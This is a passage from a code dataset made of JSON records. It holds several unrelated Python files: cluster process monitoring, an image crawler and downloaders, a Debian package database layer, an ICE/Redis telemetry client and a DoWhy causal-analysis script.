= ? AND mtime >= ?\n ''',\n (node.name, cluster.states['stime'] - settings.TIME_DELTA)\n )\n if job_cursor.fetchall():\n continue\n # start checking ps number\n for user in settings.USERS:\n ps_cursor.execute('''\n SELECT COUNT(*) FROM process\n WHERE owner=?\n ''',\n (user,)\n )\n ps_num = ps_cursor.fetchall()[0][0]\n \"\"\"\n ps_cursor.execute('''\n SELECT DISTINCT command FROM process\n WHERE owner=?\n ''',\n (user,)\n )\n # command would be ['vasp', 'abinit']\n command = [record[0] for record in ps_cursor.fetchall()]\n \"\"\"\n job_cursor.execute('''\n SELECT SUM(cpu_num) FROM job\n WHERE owner=? AND node = ? AND state = ?\n ''',\n (user, node.name, 'R')\n )\n cpu_num = job_cursor.fetchall()[0][0]\n if cpu_num is None:\n cpu_num = 0\n # only one process existing possibly means the program is single-threaded\n if ps_num != cpu_num and ps_num != 1:\n node.indicators['not_equal_ps_num'] += [{'user': user, 'ps_num': ps_num, 'cpu_num': cpu_num}]\n\n if cpu_num > 0 and (user not in node.states['users']):\n node.indicators['no_ps'] += [user]\n \"\"\"\n job_cursor.execute('''\n SELECT SUM(process_num) FROM job\n WHERE owner=? AND node = ? AND stime <= ? AND ftime <= ? AND ftime >= ?\n ''',\n (user, node.name, node.states['ps_time'], node.states['ps_time']+settings.FTIME_DELTA,\n node.states['ps_time']-settings.FTIME_DELTA)\n )\n job_ps_num_fdelta = job_cursor.fetchall()[0][0]\n if job_ps_num_fdelta is None:\n job_ps_num_fdelta = 0\n job_cursor.execute('''\n SELECT SUM(process_num) FROM job\n WHERE owner=? AND node = ? AND stime <= ? AND stime >= ? AND ftime >= ?\n ''',\n (user, node.name, node.states['ps_time']+settings.STIME_DELTA,\n node.states['ps_time']-settings.STIME_DELTA, node.states['ps_time'])\n )\n job_ps_num_sdelta = job_cursor.fetchall()[0][0]\n if job_ps_num_sdelta is None:\n job_ps_num_sdelta = 0\n # SQL may return None if no such job exists\n if job_ps_num is None:\n job_ps_num = 0\n job_ps_num_delta = job_ps_num_fdelta + job_ps_num_sdelta\n\n if actual_ps_num > job_ps_num + job_ps_num_delta or actual_ps_num < job_ps_num - job_ps_num_delta:\n node.indicators['not_equal_ps_num'] += [{'user': user, 'actual_ps_num': actual_ps_num,\n 'job_ps_num': job_ps_num, 'command': command,\n 'job_ps_num_delta': job_ps_num_delta, }]\n\n \"\"\"\n\n\ndef cal_waiting_process(cluster):\n \"\"\"\n check each node for process busy for IO and store it in node.indicators['waiting_process']\n \"\"\"\n for node in cluster.nodes:\n if node.states['ps'] is None:\n node.indicators.update({'waiting_process': None})\n continue\n node.indicators.update({'waiting_process': []})\n cursor = node.states['ps'].cursor()\n cursor.execute('''\n SELECT owner, state, cpu FROM process\n WHERE state=?\n ''',\n ('D',)\n )\n ps = cursor.fetchall()\n for process in ps:\n node.indicators['waiting_process'] += [{'user': process[0], 'state': process[1], 'cpu': process[2]}]\n\n\ndef cal_connection(cluster):\n \"\"\"\n check whether the nodes are connected and store it in node.indicators['is_connected']\n \"\"\"\n if cluster.states['jobs'] is None:\n cluster.indicators.update({'is_connected': False})\n else:\n cluster.indicators.update({'is_connected': True})\n for node in cluster.nodes:\n if node.states['ps'] is None:\n node.indicators.update({'is_connected': False})\n else:\n node.indicators.update({'is_connected': True})\n\n\ndef cal_users(cluster):\n \"\"\"\n calculate all the users in each node and store it in node.indicators['users'].\n the format is like ['swj', 'wangc']\n \"\"\"\n for node in cluster.nodes:\n if node.states['users'] is None or cluster.states['jobs'] is None:\n node.indicators.update({'users': None, 'job_users': None})\n continue\n node.indicators.update({'users': node.states['users']})\n cursor = cluster.states['jobs'].cursor()\n cursor.execute('''\n SELECT job_id, owner, state FROM job\n WHERE node = ? AND state = ?\n ''',\n (node.name, 'R')\n )\n node.indicators.update({'job_users': [item[1] for item in cursor.fetchall()]})\n node.indicators['job_users'] = list(set(node.indicators['job_users']))\n\n","sub_path":"cal_indi.py","file_name":"cal_indi.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"563748007","text":"'''\n네이버에서 50장 가져오는건데 이 크롤러는 별로 안좋아보임\n'''\n\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup as bs\nfrom urllib.parse import quote_plus\n\nbaseUrl = 'https://search.naver.com/search.naver?where=image&sm=tab_jum&query='\nplusUrl = input('검색어를 입력하세요 : ')\nurl = baseUrl + quote_plus(plusUrl)\n\nhtml = urlopen(url).read()\nsoup = bs(html, \"html.parser\")\nimg = soup.find_all(class_='_img')\n\nprint(img[0])\n\nn = 1\nfor i in img:\n imgUrl = i['data-source']\n with urlopen(imgUrl) as f:\n with open(plusUrl+str(n) + '.jpg', 'wb') as h:\n img = f.read()\n h.write(img)\n n += 1\n\nprint('다운로드완료')\n\n\n","sub_path":"PYTHON/KERAS_Test/crawlingtest01.py","file_name":"crawlingtest01.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"266549862","text":"###\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2007,2008, Mike O'Connor\n# Copyright (c) 2010-2011 Stuart Prescott\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions, and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author of this software nor the name of\n# contributors to this software may be used to endorse or promote products\n# derived from this software without specific prior written consent.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES LOSS OF USE, DATA, OR PROFITS OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n###\n\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport re\nimport psycopg2\nimport psycopg2.extras\nfrom psycopg2.extensions import adapt\n\nfrom .relations import *\nfrom . import data\n\n\nclass Release(object):\n \"\"\" Class that represents the contents of a release\n i.e lists of binary and source packages \"\"\"\n def __init__(self, dbconn, arch=None, release=None, pins=None):\n self.dbconn = dbconn\n self.arch = arch\n if self.arch is None:\n self.arch = data.DebianData.default_arch\n if release is None:\n release = data.DebianData.stable_release\n if type(release) is tuple:\n self.release = release\n elif type(release) is list:\n self.release = tuple(release)\n else:\n self.release = (release,)\n self.pins = pins\n self.cache = {}\n self.scache = {}\n\n def Package(self, package, version=None, operator=None):\n \"\"\"Look up a binary package by name in the current release.\n package: name of the package (string)\n returns Package object\n \"\"\"\n phash = self._mkpackagehash(package, operator, version)\n if not phash in self.cache:\n self.cache[phash] = Package(self.dbconn, arch=self.arch, \\\n release=self.release, package=package, \\\n pins=self.pins,\n version=version, operator=operator)\n return self.cache[phash]\n\n def Source(self, package, autoBin2Src=True, version=None, operator=None):\n \"\"\"Look up a source package by name in the current release.\n package: name of the package (string)\n autoBin2Src: (default true) convert names of binary packages to\n source packages automatically if needed\n returns Package object\n \"\"\"\n phash = self._mkpackagehash(package, operator, version)\n if not phash in self.scache:\n self.scache[phash] = SourcePackage(self.dbconn, arch=self.arch, \\\n release=self.release, package=package,\n pins=self.pins,\n version=version, operator=operator)\n if autoBin2Src and not self.scache[phash].Found():\n p = self.bin2src(package)\n return self.Source(p, False)\n if not self.scache[phash].Found():\n raise PackageNotFoundError(package)\n return self.scache[phash]\n\n def bin2src(self, package):\n \"\"\"Returns the source package for a given binary package\"\"\"\n c = self.dbconn.cursor()\n c.execute(r\"\"\"SELECT source\n FROM packages\n WHERE package=%(package)s\n AND release IN %(release)s LIMIT 1\"\"\",\n dict(package=package,\n release=self.release))\n row = c.fetchone()\n if row:\n return row[0]\n else:\n raise PackageNotFoundError(package)\n\n def arch_applies(self, proposed):\n def kern_arch_split(archspec):\n if '-' in archspec:\n return archspec.split(\"-\")\n else:\n return (\"linux\", archspec)\n\n if proposed == self.arch or proposed == \"all\":\n return True\n\n (pkern, parch) = kern_arch_split(proposed)\n (skern, sarch) = kern_arch_split(self.arch)\n\n if pkern == \"any\":\n return sarch == parch\n if parch == \"any\":\n return skern == pkern\n return parch == sarch and pkern == skern\n\n def _mkpackagehash(self, package, operator, version):\n return \"%s|%s|%s\" % (package, operator, version)\n\n def __str__(self):\n return \"Release: %s.\\n\" \\\n \"\\t%d binary packages and %d source packages in cache.\" % \\\n (self.release, len(self.cache), len(self.scache))\n\n\nclass AbstractPackage(object):\n fields = ['*']\n table = ''\n column = ''\n pins = []\n data = []\n\n def __init__(self, dbconn, arch=None, release=None, package=None,\n pins=None, version=None, operator=None):\n \"\"\"\n Bind a specified binary or source package.\n\n A single release or a list or tuple of releases can be used. If more\n than one release is given, a set of pins giving the priority of the\n different releases in searching for packages can be specified. The pins\n should be a dict of releasename => pin value where higher values are\n preferred. In the absence of any specified pins, all releases are\n treated equally, meaning that the most recent package version will be\n chosen.\n\n Note that the \"pinning\" used here is a very simple rank order not the\n sophisticated system used by apt as described in apt_preferences(5).\n \"\"\"\n if not package:\n raise ValueError(\"Package name not specified\")\n# if type(package) is Package:\n# return package\n if not isinstance(package, str) and not isinstance(package, unicode):\n raise ValueError(\"What did you do to 'package'? It was a %s\" % \\\n type(package))\n self.dbconn = dbconn\n self.arch = arch\n if self.arch is None:\n self.arch = data.DebianData.default_arch\n if release is None:\n release = data.DebianData.stable_release\n if type(release) is tuple:\n self.release = release\n elif type(release) is list:\n self.release = tuple(release)\n else:\n self.release = (release,)\n self.package = package\n if pins and not type(pins) is dict:\n raise ValueError(\"List of pins must be a dict mapping the \"\n \"release name to its relative importance.\")\n self.pins = pins\n self.version = version\n self.operator = operator\n self._Fetch()\n\n def _Fetch(self):\n c = self.dbconn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n f = ','.join(self.fields)\n pin = ''\n if self.pins and self.release:\n pin = \"pin DESC, \"\n cases = [\"WHEN release = %s THEN %s\" % \\\n (adapt(r), adapt(self.pins[r])) \\\n for r in self.pins.keys()]\n f += \", CASE %s ELSE 0 END AS pin\" % ' '.join(cases)\n verwhere = \"\"\n if self.version and self.operator:\n verwhere = \"AND version %s debversion(%s)\" % \\\n (self.operator.replace('>>', '>').replace('<<', '<'),\n adapt(self.version))\n c.execute(r\"\"\"SELECT \"\"\" + f + \"\"\"\n FROM \"\"\" + self.table + \"\"\"\n WHERE \"\"\" + self.column + \"\"\"=%(package)s\n AND (architecture='all' OR architecture=%(arch)s)\n AND release IN %(release)s \"\"\" + verwhere + \"\"\"\n ORDER BY \"\"\" + pin + \"\"\"version DESC\n LIMIT 1\"\"\",\n dict(package=self.package,\n arch=self.arch,\n release=self.release))\n self.data = c.fetchone()\n\n def Found(self):\n '''Does the package exist in the database for the release specified?\n\n For binary packages this is equivalent to:\n \"Is the package a real package?\"\n (returns false for packages that are only virtual packages)'''\n return self.data != None\n\n def RelationEntry(self, relation, combinePreDepends=True):\n if not self.Found():\n raise PackageNotFoundError(self.package)\n if relation == 'depends' and combinePreDepends:\n rs = [self.data['depends'], self.data['pre_depends']]\n return \",\".join(filter(None, rs))\n return self.data[relation]\n\n def RelationshipOptionsList(self, relation, combinePreDepends=True):\n rels = RelationshipOptionsList()\n l = self.RelationEntry(relation, combinePreDepends)\n if l:\n for r in re.split(r\"\\s*,\\s*\", l):\n roptions = RelationshipOptions(r)\n rels.append(roptions)\n return rels\n\n\nclass Package(AbstractPackage):\n def __init__(self, dbconn, arch=None, release=None, package=None,\n pins=None, version=None, operator=None):\n \"\"\"\n Bind a specified binary package from a releases, list of releases\n or tuple of releases\n\n \"\"\"\n self.table = 'packages'\n self.column = 'package'\n self._ProvidersList = None\n self.installable = None\n AbstractPackage.__init__(self, dbconn, arch, release, package,\n pins=pins, version=version, operator=operator)\n\n def IsVirtual(self):\n \"\"\"Test if the package is a virtual package.\n\n Tests to see if any package Provides the current package\n \"\"\"\n return len(self.ProvidersList()) > 0\n\n def IsVirtualOnly(self):\n \"\"\"Test if the package is a (purely) virtual package.\"\"\"\n return not self.Found() and self.IsVirtual()\n\n def IsAvailable(self):\n return self.Found() or self.IsVirtual()\n\n def ProvidersList(self):\n if self._ProvidersList == None:\n # remove all characters from the package name that aren't legal in\n # a package name i.e. not in:\n # a-z0-9-.+\n # see §5.6.1 of Debian Policy \"Source\" for details.\n # http://www.debian.org/doc/debian-policy/ch-controlfields.html#s-f-Source\n #\n # \\m is start word boundary, \\M is finish word boundary\n # (but - in package name is a word boundary)\n # \\A is start string, \\Z is finish string\n # http://www.postgresql.org/docs/8.3/static/functions-matching.html\n packagere = r\"(?:\\A|[, ])%s(?:\\Z|[, ])\" % \\\n re.escape(re.sub(r\"[^a-z\\d\\-+.]\", \"\", self.package))\n # print(packagere)\n c = self.dbconn.cursor()\n c.execute(r\"\"\"SELECT DISTINCT package\n FROM packages\n WHERE provides ~ %(package)s\n AND (architecture='all' OR architecture=%(arch)s)\n AND release IN %(release)s\"\"\",\n dict(package=packagere,\n arch=self.arch,\n release=self.release))\n pkgs = []\n for row in c.fetchall():\n pkgs.append(row[0])\n self._ProvidersList = pkgs\n return self._ProvidersList\n\n def PreDepends(self):\n return self.RelationEntry('pre_depends')\n\n def PreDependsList(self):\n return self.RelationshipOptionsList('pre_depends')\n\n def Depends(self, combinePreDepends=True):\n return self.RelationEntry('depends', combinePreDepends)\n\n def DependsList(self, combinePreDepends=True):\n return self.RelationshipOptionsList('depends', combinePreDepends)\n\n def Recommends(self):\n return self.RelationEntry('recommends')\n\n def RecommendsList(self):\n return self.RelationshipOptionsList('recommends')\n\n def Suggests(self):\n return self.RelationEntry('suggests')\n\n def SuggestsList(self):\n return self.RelationshipOptionsList('suggests')\n\n def Enhances(self):\n return self.RelationEntry('enhances')\n\n def EnhancesList(self):\n return self.RelationshipOptionsList('enhances')\n\n def Conflicts(self):\n return self.RelationEntry('conflicts')\n\n def ConflictsList(self):\n return self.RelationshipOptionsList('conflicts')\n\n def Breaks(self):\n return self.RelationEntry('breaks')\n\n def BreaksList(self):\n return self.RelationshipOptionsList('breaks')\n\n def Replaces(self):\n return self.RelationEntry('replaces')\n\n def ReplacesList(self):\n return self.RelationshipOptionsList('replaces')\n\n def __str__(self):\n return \"Package %s on %s in release %s\" % \\\n (self.package, self.arch, self.release)\n\n\nclass SourcePackage(AbstractPackage):\n def __init__(self, dbconn, arch=None, release=None, package=None,\n pins=None, version=None, operator=None):\n #self.fields = ['build_depends', 'build_depends_indep', 'version']\n self.table = 'sources'\n self.column = 'source'\n #self.autobin2src = kwargs.get('bin2src', True)\n AbstractPackage.__init__(self, dbconn, arch, release, package,\n pins=pins, version=version, operator=operator)\n\n def _Fetch(self):\n c = self.dbconn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n f = ','.join(self.fields)\n c.execute(r\"\"\"SELECT \"\"\" + f + \"\"\"\n FROM \"\"\" + self.table + \"\"\"\n WHERE \"\"\" + self.column + \"\"\"=%(package)s\n AND release IN %(release)s\n ORDER BY version DESC\n LIMIT 1\"\"\",\n dict(package=self.package,\n release=self.release))\n self.data = c.fetchone()\n\n def Binaries(self):\n c = self.dbconn.cursor()\n c.execute(r\"\"\"SELECT DISTINCT package\n FROM packages\n WHERE source=%(package)s\n AND release IN %(release)s\"\"\",\n dict(package=self.package,\n arch=self.arch,\n release=self.release))\n pkgs = []\n for row in c.fetchall():\n pkgs.append(row[0])\n return pkgs\n\n def BuildDepends(self):\n return self.RelationEntry('build_depends')\n\n def BuildDependsList(self):\n return self.RelationshipOptionsList('build_depends')\n\n def BuildDependsIndep(self):\n return self.RelationEntry('build_depends_indep')\n\n def BuildDependsIndepList(self):\n return self.RelationshipOptionsList('build_depends_indep')\n\n\nclass PackageNotFoundError(LookupError):\n \"\"\"Exception raised when a package is assumed to exist but doesn't\"\"\"\n\n def __init__(self, package):\n self.package = package\n\n def __str__(self):\n return \"Package was not found: %s\" % self.package\n","sub_path":"supybot/plugins/Judd/uddcache/packages.py","file_name":"packages.py","file_ext":"py","file_size_in_byte":16033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"81777618","text":"from pprint import pprint\r\nimport math\r\nimport pygame\r\nfrom pygame.locals import *\r\nimport sys\r\n\r\n\r\ncsv_file = open('TOEIC.csv','r')\r\nline = csv_file.readline()\r\nline = csv_file.readline()\r\ncounter = []\r\nhumidity = []\r\ntemperature = []\r\nwhile line:\r\n list = line.split(\";\")\r\n if(len(list) > 1): \r\n counter.append(float(list[1]))\r\n humidity.append(float(list[4])) \r\n temperature.append(float(list[8]))\r\n line = csv_file.readline()\r\ncsv_file.close()\r\n#print(counter)\r\n#print(humidity)\r\n#print(temperature)\r\n\r\ntemperature_per_hour = []\r\ni = 0\r\nfor i in range(12, len(counter), 12):\r\n\taverage = sum(temperature[i-12:i])/12\r\n\taverage2 = average\r\n\ttemperature_per_hour += [average2]\r\n\tprint(average2)\r\nprint(temperature_per_hour)\r\n\r\n\r\n\r\n\r\n\r\ncsv_climate_file = open('CountryClimate.csv','r')\r\ncsv_climate_file.readline()\r\nline = csv_climate_file.readline()\r\ntemp = {}\r\n#humid = []\r\nwhile line:\r\n\tlist = line.split(',')\r\n\tif(len(list) > 1):\r\n\t\t# country.append()\r\n\t\t#humid.append(int(list[2]))\r\n\t\ttemp[list[0]] = int(list[1])\r\n\tline = csv_climate_file.readline()\r\ncsv_climate_file.close()\r\n# print(country)\r\nprint(temp)\r\n\r\n\r\nfor i in range(len(temperature_per_hour)):\r\n\tclimate_temp_n = [(x[0], abs(x[1] - temperature_per_hour[i])) for x in temp.items()] #itemsのところで辞書のすべてを持ってきてる\r\n\tclimate_temp_n = sorted(climate_temp_n, key=lambda x: x[1]) #データのソートを行う\r\n\r\n\r\n\tprint(str(i) + ': ' + ','.join([value[0] for value in climate_temp_n if value[1] == climate_temp_n[0][1]])) #もし値が同じほかの国があればそれも出力する(配列を結合してる)\r\n\r\n\r\n\r\n","sub_path":"123.py","file_name":"123.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"476084909","text":"# Copyright (c) Karan Desai (https://kdexd.xyz), The University of Michigan.\n\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport io\nimport os\n\nimport requests\nfrom PIL import Image\n\n\nclass ImageDownloader(object):\n r\"\"\"\n Download an image from a URL and save it on disk. This downloader handles\n multiple edge-cases, and is specifcially suited for RedCaps images, all of\n which are sourced from Reddit (``i.redd.it``), Imgur (``i.imgur.com``) or\n Flickr (``farm.static.flickr.com``).\n\n Args:\n longer_resize: Resize the longer edge of image to this size before\n saving to disk (preserve aspect ratio). Set to -1 to avoid any\n resizing. Defaults to 512.\n \"\"\"\n\n def __init__(self, longer_resize: int = 512):\n self.longer_resize = longer_resize\n\n def download(self, url: str, save_to: str) -> bool:\n r\"\"\"\n Download image from ``url`` and save it to ``save_to``.\n\n Args:\n url: Image URL to download from.\n save_to: Local path to save the downloaded image.\n\n Returns:\n Boolean variable indicating whether the download was successful\n (``True``) or not (``False``).\n \"\"\"\n\n try:\n # 'response.content' will have our image (as bytes) if successful.\n response = requests.get(url)\n\n # Check if image was downloaded (response must be 200). One exception:\n # Imgur gives response 200 with \"removed.png\" image if not found.\n if response.status_code != 200 or \"removed.png\" in response.url:\n return False\n\n # Write image to disk if it was downloaded successfully.\n pil_image = Image.open(io.BytesIO(response.content)).convert(\"RGB\")\n\n # Resize image to longest max size while preserving aspect ratio if\n # longest max size is provided (not -1), and image is bigger.\n if self.longer_resize > 0:\n image_width, image_height = pil_image.size\n\n scale = self.longer_resize / float(max(image_width, image_height))\n\n if scale != 1.0:\n new_width, new_height = tuple(\n int(round(d * scale)) for d in (image_width, image_height)\n )\n pil_image = pil_image.resize((new_width, new_height))\n\n # Save the downloaded image to disk.\n os.makedirs(os.path.dirname(save_to), exist_ok=True)\n pil_image.save(save_to)\n\n return True\n\n except Exception:\n return False\n","sub_path":"redcaps/downloaders/image_downloader.py","file_name":"image_downloader.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"119311292","text":"#!/usr/bin/python\n#-*-coding:utf-8-*-\n\nimport sys, traceback, Ice\nIce.loadSlice(\"./ice-redis.ice\")\nimport CommandArea, DemoArea, YXArea\nimport time\n\nstatus = 0\nic = None\ntry:\n ic = Ice.initialize(sys.argv)\n base = ic.stringToProxy(\"DataCommand:default -h 192.168.100.170 -p 10000\")\n DataCommand = CommandArea.DataCommandPrx.checkedCast(base)\n if not DataCommand:\n raise RuntimeError(\"Invalid proxy\")\n \n pIDs = []\n yxdata = []\n for i in range(5):\n pIDs.append(i)\n structyxdata = YXArea.DxDTYX(i, i+10, i)\n yxdata.append(structyxdata)\n \n station = 1\n pID=1\n datetime1 = \"20190515000000\"\n datetime2 = \"20190515180000\"\n datetime = \"20190515120000\"\n datetime0 = \"20190515\"\n \n # redis写入遥信数据\n #yxstatus = DataCommand.RPCSaveYXData(station, pIDs, yxdata)\n #print(yxstatus)\n \n # 实时数据读取\n #yxstatus,yxdata = DataCommand.RPCGetRealtimeYXData (station, pIDs)\n \n # 时间点数据读取\n #yxstatus,yxdata = DataCommand.RPCGetTimePointYXData (station, datetime, pIDs)\n \n # 单点某天全部数据读取\n #yxstatus,yxdata = DataCommand.RPCGetDayYXData (station, datetime0, pID)\n\n # 多点某天全部数据读取\n #yxstatus,pIDNum,yxdata = DataCommand.RPCGetDayYXDatas (station, datetime0, pIDs)\n \n # 单点时间段数据获取函数\n yxstatus,yxdata = DataCommand.RPCGetPeriodYXData(station, datetime1, datetime2, pID)\n \n print(yxstatus)\n #print(pIDNum) \n \n for i in range(len(yxdata)):\n print(yxdata[i].status, yxdata[i].value, yxdata[i].timetag)\n\nexcept:\n traceback.print_exc()\n status = 1\n\nif ic:\n try:\n ic.destroy()\n except:\n traceback.print_exc()\n status = 1\nsys.exit(status)\n","sub_path":"ice/20190515-station/yxdata_client.py","file_name":"yxdata_client.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"300547013","text":"import os, sys\r\n\r\n#sys.path.append(r\"C:\\Users\\Administrator\\Downloads\\dowhy-master-0514\")\r\nsys.path.append(r\"C:\\Users\\Administrator\\Downloads\\dowhy-master\")\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport networkx as nx\r\nimport random as rd\r\nfrom sklearn.utils import shuffle\r\nimport multiprocessing as mp\r\nimport time\r\nfrom sklearn.metrics import roc_auc_score\r\n\r\n\r\nimport dowhy\r\nfrom dowhy.do_why import CausalModel\r\n\r\ndef BuildAM(par, t, data_type):\r\n k = par[\"k\"]\r\n path = par[\"path\"]\r\n os.chdir(path)\r\n if(t == \"cg\"):\r\n G = nx.complete_graph(10)\r\n am = nx.to_pandas_adjacency(G)\r\n elif(t == \"half\"):\r\n am = pd.read_table(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\inter_\" + str(k) + \".txt\", header=None)\r\n am = CreatPesudoAM(am)\r\n elif(t == \"mmhc\"):\r\n am = pd.read_csv(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\\" + par[\"i\"] + \"_\" + par[\"j\"] + \"\\\\mmhc\\\\\"+ data_type+ \"_adjacent_matrix_\" + str(k) + \".csv\", index_col=0)\r\n elif(t == \"sparcc\"):\r\n p = pd.read_table(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\\" + par[\"i\"] + \"_\" + par[\"j\"] + \"\\\\SparCC\\\\p_\" + str(k) + \".txt\", index_col=0)\r\n am = pd.DataFrame(np.zeros([p.shape[0], p.shape[0]]))\r\n am.columns = [\"sp\" + str(i) for i in range(p.shape[0])]\r\n am.index = [\"sp\" + str(i) for i in range(p.shape[0])]\r\n for s in range(p.shape[0]):\r\n for t in range(p.shape[1]):\r\n if(p.ix[s, t] <= 0.05):\r\n am.ix[s, t] = 1\r\n elif(t == \"true\"):\r\n am = pd.read_table(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\inter_\" + str(k) + \".txt\", header=None)\r\n label = [\"sp\" + str(i) for i in range(len(am))]\r\n am.index = label; am.columns = label\r\n #am = pd.DataFrame(am, index=label, columns=label)\r\n return am\r\n\r\ndef CreatPesudoAM(TrueAM, proba=0.5):\r\n PesudoAM = np.matrix(TrueAM) + np.diag([0.5] * len(TrueAM))\r\n TrueAM = np.matrix(TrueAM) + np.diag([0.5] * len(TrueAM))\r\n index_positive = np.argwhere(TrueAM != 0)\r\n index_negative = np.argwhere((TrueAM + np.diag([1] * len(TrueAM))) == 0)\r\n for x, y in rd.sample(list(index_positive), int(len(index_positive) * proba)):\r\n loc = rd.choice(index_negative)\r\n PesudoAM[x, y], PesudoAM[loc[0], loc[1]] = 0, PesudoAM[x, y]\r\n index_negative = np.delete(index_negative, loc, axis=0)\r\n return pd.DataFrame(PesudoAM)\r\n\r\n\r\ndef getAllEdges(am, vertices):\r\n edges_array = []\r\n for i in range(len(am)):\r\n for j in range(len(am)):\r\n if am.ix[i, j] != 0:\r\n edges_array.append((vertices[j], vertices[i],)) # edges_list : [(source, target),()]\r\n return edges_array\r\n\r\n\r\ndef CreatGML(am, vertices, treatment, outcome):\r\n edges_list = getAllEdges(am, vertices)\r\n gml_graph = 'graph[directed 1 '\r\n gml_graph = gml_graph + \" \".join(['node[ id \"{0}\" label \"{0}\"]'.format(n) for n in vertices])\r\n gml_graph = gml_graph + \" \".join(['edge[ source \"{0}\" target \"{1}\"]'.format(s, t) for s, t in edges_list])\r\n gml_graph = gml_graph + ']'\r\n return gml_graph\r\n\r\n\r\ndef CreatData(dat, am, treatment=\"sp0\", outcome=\"sp1\"):\r\n treatment = treatment\r\n outcome = outcome\r\n vertices = list(am.index)\r\n gml_graph = CreatGML(am, vertices, treatment, outcome)\r\n\r\n ret_dict = {\r\n \"df\": dat,\r\n \"treatment_name\": treatment,\r\n \"outcome_name\": outcome,\r\n # \"common_causes_names\": common_causes,\r\n # \"instrument_names\": instruments,\r\n \"gml_graph\": gml_graph,\r\n }\r\n return ret_dict\r\n\r\ndef CalDoWhy(dat):\r\n model = CausalModel(\r\n data=dat[\"df\"],\r\n treatment=dat[\"treatment_name\"],\r\n outcome=dat[\"outcome_name\"],\r\n graph=dat[\"gml_graph\"]\r\n )\r\n\r\n # Identification\r\n identified_estimand = model.identify_effect()\r\n\r\n # Estimation\r\n causal_estimate = model.estimate_effect(identified_estimand,\r\n method_name=\"backdoor.linear_regression\")\r\n\r\n return causal_estimate\r\n\r\ndef CalPvalue(dat, value):\r\n nullmodel = []\r\n c = 0\r\n while(True):\r\n try:\r\n dat[\"df\"] = shuffle(dat[\"df\"])\r\n causal_estimate = CalDoWhy(dat)\r\n nullmodel.append(causal_estimate.value)\r\n except ValueError:\r\n c -= 1\r\n finally:\r\n c += 1\r\n if c == 1000:\r\n break\r\n p_value = sum([1 if nullmodel[s] > abs(value) else 0 for s in range(len(nullmodel))]) / len(nullmodel)\r\n print(p_value)\r\n return p_value\r\n\r\ndef main(count, am):\r\n label = [\"sp\" + str(i) for i in range(len(am))]\r\n value = pd.DataFrame(np.zeros([am.shape[0], am.shape[0]]), index=label, columns=label)\r\n p = pd.DataFrame(np.ones([am.shape[0], am.shape[0]]), index=label, columns=label)\r\n for i in range(am.shape[0]):\r\n for j in range(am.shape[0]):\r\n if (i != j):\r\n start_time = time.time()\r\n treatment = label[i]\r\n outcome = label[j]\r\n dat = CreatData(count, am, treatment, outcome)\r\n try:\r\n causal_estimate = CalDoWhy(dat)\r\n value.ix[j, i] = causal_estimate.value\r\n except ValueError:\r\n value.ix[j, i] = 0\r\n continue\r\n print(causal_estimate)\r\n pvalue = CalPvalue(dat, causal_estimate.value)\r\n print(pvalue)\r\n p.ix[j, i] = pvalue\r\n print(\"***************************\"+str(time.time()-start_time)+\"***********\")\r\n return value, p\r\n\r\n\r\ndef StandardOutput(am, t, method, k, path, data_type=\"RA\", matrix_type=\"am\"):\r\n if(not os.path.exists(path +\"\\\\DoWhy\")):\r\n os.mkdir(path +\"\\\\DoWhy\")\r\n os.chdir(path +\"\\\\DoWhy\")\r\n print(os.getcwd())\r\n if (not os.path.exists(method + \"_\" + t + str(1))):\r\n os.makedirs(method + \"_\" + t + str(1))\r\n am = pd.DataFrame(am)\r\n am.columns = [\"sp\" + str(i) for i in range(am.shape[0])]\r\n am.index = [\"sp\" + str(i) for i in 